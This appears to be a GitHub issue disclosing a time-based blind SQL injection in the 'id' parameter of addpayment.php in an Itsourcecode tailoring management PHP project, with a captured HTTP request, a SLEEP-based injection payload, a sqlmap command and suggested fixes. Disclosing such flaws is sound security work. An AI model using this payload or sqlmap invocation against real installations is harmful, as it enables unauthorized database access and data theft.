Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

TMP #4

Open
magic2353112890 opened this issue Jan 23, 2025 · 0 comments
Open

TMP #4

magic2353112890 opened this issue Jan 23, 2025 · 0 comments

Comments

@magic2353112890
Copy link
Owner

Itsourcecode Tailoring Management System Project In PHP With Source Code v1.0 addpayment.php parameter SQL injection

NAME OF AFFECTED PRODUCT(S)

  • Tailoring Management System Project In PHP With Source Code

Vendor Homepage

AFFECTED AND/OR FIXED VERSION(S)

submitter

  • lyp123

Vulnerable File

  • addpayment.php

VERSION(S)

  • V1.0

Software Link

PROBLEM TYPE

Vulnerability Type

  • SQL injection

Root Cause

  • A SQL injection vulnerability was found in the addpayment.php file of the Tailoring Management System Project In PHP With Source Code project. The reason for this issue is that an attacker injects malicious code from the "id" parameter and uses it directly in SQL queries without proper sanitization or validation. This allows an attacker to forge input values to manipulate SQL queries and perform unauthorized actions.

1

Impact

  • Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.

DESCRIPTION

  • Due to insufficient user input validation for the "id" parameter, a serious SQL injection vulnerability has been discovered in the "Tailoring Management System Project in PHP With Source Code", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity.

Vulnerability details and POC

POST /tailor/addpayment.php?id=1 HTTP/1.1
Host: localhost
Content-Length: 40
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/tailor/addpayment.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=0ut1k1epqdba6pad7kkkacdub6
Connection: close

amount=1&date=2025-01-23&desc=2&inccat=1

Vulnerability type:

  • time-based blind

Vulnerability location:

  • 'id' parameter

Payload:

Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 6774 FROM (SELECT(SLEEP(5)))LAGQ) AND 'XAVs'='XAVs

2

The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:

python sqlmap.py -r "1.txt" -p id –current-db --batch

3

Suggested repair

  1. Use prepared statements and parameter binding:
    Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.

  2. Input validation and filtering:
    Strictly validate and filter user input data to ensure it conforms to the expected format.

  3. Minimize database user permissions:
    Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.

  4. Regular security audits:
    Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.

@magic2353112890 magic2353112890 changed the title Itsourcecode Tailoring Management System Project In PHP With Source Code v1.0 addpayment.php SQL injection TEMP Jan 30, 2025
@magic2353112890 magic2353112890 changed the title TEMP TMP Jan 30, 2025
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant